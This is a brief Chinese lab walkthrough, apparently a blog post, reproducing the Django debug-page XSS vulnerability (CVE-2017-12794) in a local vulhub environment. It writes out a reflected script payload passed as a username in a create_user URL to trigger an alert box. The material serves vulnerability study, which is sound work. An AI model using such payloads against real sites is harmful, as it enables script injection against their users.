复现环境:vulhub
1.开启该环境
命令:docker-compose up -d

2.访问网址:127.0.0.1:8000/create_user/?username=<script>alert(2)</script>

显示成功创建一个用户
3.再次访问该网址:127.0.0.1:8000/create_user/?username=<script>alert(2)</script>

弹出XSS弹窗。
Django debug page XSS漏洞(CVE-2017-12794)
最新推荐文章于 2024-11-02 18:06:35 发布
本文介绍如何在vulhub环境中复现XSS漏洞。通过特定命令启动环境,并利用恶意脚本创建用户触发XSS攻击,展示弹窗效果。
733

被折叠的 条评论
为什么被折叠?



